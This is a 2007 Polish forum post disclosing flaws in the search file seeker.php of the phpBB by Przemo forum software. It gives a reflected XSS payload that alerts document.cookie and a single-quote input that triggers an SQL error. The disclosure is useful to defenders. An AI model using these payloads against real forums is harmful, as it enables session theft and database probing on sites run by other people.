Forum Brzeg on
Regulamin Kalendarz Szukaj Album Rejestracja Zaloguj

MegaExpert

Poprzedni temat :: Następny temat
phpBB by Przemo XSS / błąd SQL
Autor Wiadomość
yashin 


Wiek: 35
Dołączył: 27 Lut 2007

UP 0 / UP 0



Wysłany: 2007-11-04, 12:01   phpBB by Przemo XSS / błąd SQL

Niefiltrowane zmienne w pliku:
seeker.php

XSS
w $_POST['query'] albo po prostu w polu szukaj wpisujemy:
"><script>alert(document.cookie);</script>

Ciekawostka. Błąd SQL zostanie wyświetlony jeśli np w:
$_POST['lookfor'] wpiszemy :
username'

źródło: vizzdoom :)
0 UP 0 DOWN
 
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Zobacz posty nieprzeczytane

Skocz do:  

Tagi tematu: blad, by, phpbb, przemo, sql, xss


Powered by phpBB modified by Przemo © 2003 phpBB Group
Template BMan1Blue v 0.6 modified by Nasedo
Strona wygenerowana w 0,04 sekundy. Zapytań do SQL: 19
Nasze Serwisy:









Informator Miejski:

  • Katalog Firm w Brzegu